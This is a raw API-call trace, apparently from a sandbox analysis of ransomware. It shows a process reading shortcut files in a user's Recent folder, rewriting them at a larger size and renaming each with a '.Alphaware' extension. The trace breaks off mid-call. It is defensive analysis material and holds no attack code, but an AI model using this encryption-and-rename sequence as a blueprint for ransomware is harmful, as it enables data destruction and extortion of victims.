1 [0097.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.874] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N_rlN0Z3nRhZqdxj JZI.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\n_rln0z3nrhzqdxj jzi.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.874] GetFileType (hFile=0x250) returned 0x1 [0097.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.875] GetFileType (hFile=0x250) returned 0x1 [0097.875] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x3ed [0097.875] ReadFile (in: hFile=0x250, lpBuffer=0x2448250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2448250*, lpNumberOfBytesRead=0x23e958*=0x3ed, lpOverlapped=0x0) returned 1 [0097.876] CloseHandle (hObject=0x250) returned 1 [0097.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.902] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N_rlN0Z3nRhZqdxj JZI.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\n_rln0z3nrhzqdxj jzi.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.903] GetFileType (hFile=0x250) returned 0x1 [0097.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.903] GetFileType (hFile=0x250) returned 0x1 [0097.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.905] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N_rlN0Z3nRhZqdxj JZI.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\n_rln0z3nrhzqdxj jzi.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf4468e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf4468e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c8d1560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608)) returned 1 [0097.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.905] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N_rlN0Z3nRhZqdxj JZI.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\n_rln0z3nrhzqdxj jzi.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N_rlN0Z3nRhZqdxj JZI.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\n_rln0z3nrhzqdxj jzi.lnk.alphaware")) returned 1 [0097.906] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\O4VMeO_PmK30fk6.lnk", dwFileAttributes=0x80) returned 1 [0097.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.907] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\O4VMeO_PmK30fk6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\o4vmeo_pmk30fk6.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24c9f20 | out: lpFileInformation=0x24c9f20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd11e1a80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11e1a80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd11e1a80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9f5)) returned 1 [0097.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.907] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\O4VMeO_PmK30fk6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\o4vmeo_pmk30fk6.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.907] GetFileType (hFile=0x250) returned 0x1 [0097.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.907] GetFileType (hFile=0x250) returned 0x1 [0097.908] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x9f5 [0097.908] ReadFile (in: hFile=0x250, lpBuffer=0x24cac08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24cac08*, lpNumberOfBytesRead=0x23e958*=0x9f5, lpOverlapped=0x0) returned 1 [0097.909] CloseHandle (hObject=0x250) returned 1 [0097.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.934] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\O4VMeO_PmK30fk6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\o4vmeo_pmk30fk6.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.935] GetFileType (hFile=0x250) returned 0x1 [0097.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.935] GetFileType (hFile=0x250) returned 0x1 [0097.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.937] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\O4VMeO_PmK30fk6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\o4vmeo_pmk30fk6.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11e1a80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11e1a80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c91d820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe20)) returned 1 [0097.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.937] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\O4VMeO_PmK30fk6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\o4vmeo_pmk30fk6.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\O4VMeO_PmK30fk6.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\o4vmeo_pmk30fk6.lnk.alphaware")) returned 1 [0097.938] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oa aQQjrX6y_jTlap6.lnk", dwFileAttributes=0x80) returned 1 [0097.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.942] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oa aQQjrX6y_jTlap6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\oa aqqjrx6y_jtlap6.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25500c0 | out: lpFileInformation=0x25500c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf7665c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf7665c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf7665c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x24a)) returned 1 [0097.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.942] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oa aQQjrX6y_jTlap6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\oa aqqjrx6y_jtlap6.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.943] GetFileType (hFile=0x250) returned 0x1 [0097.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.943] GetFileType (hFile=0x250) returned 0x1 [0097.943] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x24a [0097.943] ReadFile (in: hFile=0x250, lpBuffer=0x2550620, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2550620*, lpNumberOfBytesRead=0x23e958*=0x24a, lpOverlapped=0x0) returned 1 [0097.944] CloseHandle (hObject=0x250) returned 1 [0097.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.966] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oa aQQjrX6y_jTlap6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\oa aqqjrx6y_jtlap6.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.968] GetFileType (hFile=0x250) returned 0x1 [0097.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.968] GetFileType (hFile=0x250) returned 0x1 [0097.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.970] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oa aQQjrX6y_jTlap6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\oa aqqjrx6y_jtlap6.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf7665c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf7665c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c969ae0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0)) returned 1 [0097.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.970] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oa aQQjrX6y_jTlap6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\oa aqqjrx6y_jtlap6.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oa aQQjrX6y_jTlap6.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\oa aqqjrx6y_jtlap6.lnk.alphaware")) returned 1 [0097.972] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OnrpsaEkvylzPJqZCM2l.mkv.lnk", dwFileAttributes=0x80) returned 1 [0097.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.973] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OnrpsaEkvylzPJqZCM2l.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\onrpsaekvylzpjqzcm2l.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25d0b68 | out: lpFileInformation=0x25d0b68*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1149500, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1149500, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1149500, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x316)) returned 1 [0097.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.974] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OnrpsaEkvylzPJqZCM2l.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\onrpsaekvylzpjqzcm2l.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.974] GetFileType (hFile=0x250) returned 0x1 [0097.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.974] GetFileType (hFile=0x250) returned 0x1 [0097.974] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x316 [0097.974] ReadFile (in: hFile=0x250, lpBuffer=0x25d11b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25d11b8*, lpNumberOfBytesRead=0x23e958*=0x316, lpOverlapped=0x0) returned 1 [0097.975] CloseHandle (hObject=0x250) returned 1 [0098.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.001] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OnrpsaEkvylzPJqZCM2l.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\onrpsaekvylzpjqzcm2l.mkv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.003] GetFileType (hFile=0x250) returned 0x1 [0098.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.003] GetFileType (hFile=0x250) returned 0x1 [0098.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.005] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OnrpsaEkvylzPJqZCM2l.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\onrpsaekvylzpjqzcm2l.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1149500, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1149500, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c9dbf00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4f4)) returned 1 [0098.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.005] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OnrpsaEkvylzPJqZCM2l.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\onrpsaekvylzpjqzcm2l.mkv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OnrpsaEkvylzPJqZCM2l.mkv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\onrpsaekvylzpjqzcm2l.mkv.lnk.alphaware")) returned 1 [0098.006] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oOpoFnm9s.lnk", dwFileAttributes=0x80) returned 1 [0098.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.007] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oOpoFnm9s.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\oopofnm9s.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2451058 | out: lpFileInformation=0x2451058*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd06df4c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd06df4c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd06df4c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1241)) returned 1 [0098.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.007] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oOpoFnm9s.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\oopofnm9s.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.008] GetFileType (hFile=0x250) returned 0x1 [0098.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.008] GetFileType (hFile=0x250) returned 0x1 [0098.008] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x1241 [0098.008] ReadFile (in: hFile=0x250, lpBuffer=0x24512f8, nNumberOfBytesToRead=0x1241, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24512f8*, lpNumberOfBytesRead=0x23e958*=0x1241, lpOverlapped=0x0) returned 1 [0098.009] CloseHandle (hObject=0x250) returned 1 [0098.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.033] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oOpoFnm9s.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\oopofnm9s.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.034] GetFileType (hFile=0x250) returned 0x1 [0098.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.035] GetFileType (hFile=0x250) returned 0x1 [0098.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.036] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oOpoFnm9s.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\oopofnm9s.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd06df4c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd06df4c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ca281c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1934)) returned 1 [0098.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.036] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oOpoFnm9s.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\oopofnm9s.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oOpoFnm9s.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\oopofnm9s.lnk.alphaware")) returned 1 [0098.038] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ozdQhhdYCAhwn.lnk", dwFileAttributes=0x80) returned 1 [0098.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.038] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ozdQhhdYCAhwn.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ozdqhhdycahwn.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24dc690 | out: lpFileInformation=0x24dc690*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0cd2bc0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0cd2bc0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0cd2bc0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9d4)) returned 1 [0098.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.038] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ozdQhhdYCAhwn.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ozdqhhdycahwn.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.039] ReadFile (in: hFile=0x250, lpBuffer=0x24dd358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24dd358*, lpNumberOfBytesRead=0x23e958*=0x9d4, lpOverlapped=0x0) returned 1 [0098.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.064] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ozdQhhdYCAhwn.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ozdqhhdycahwn.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.068] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ozdQhhdYCAhwn.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ozdqhhdycahwn.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0cd2bc0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0cd2bc0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ca74480, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdf4)) returned 1 [0098.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.069] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ozdQhhdYCAhwn.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ozdqhhdycahwn.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ozdQhhdYCAhwn.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ozdqhhdycahwn.lnk.alphaware")) returned 1 [0098.070] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PPCDrQ5.lnk", dwFileAttributes=0x80) returned 1 [0098.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.071] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PPCDrQ5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ppcdrq5.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2562698 | out: lpFileInformation=0x2562698*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfc291c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc291c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfc291c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x99d)) returned 1 [0098.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.071] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PPCDrQ5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ppcdrq5.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.071] ReadFile (in: hFile=0x250, lpBuffer=0x25632e8, nNumberOfBytesToRead=0x1000, 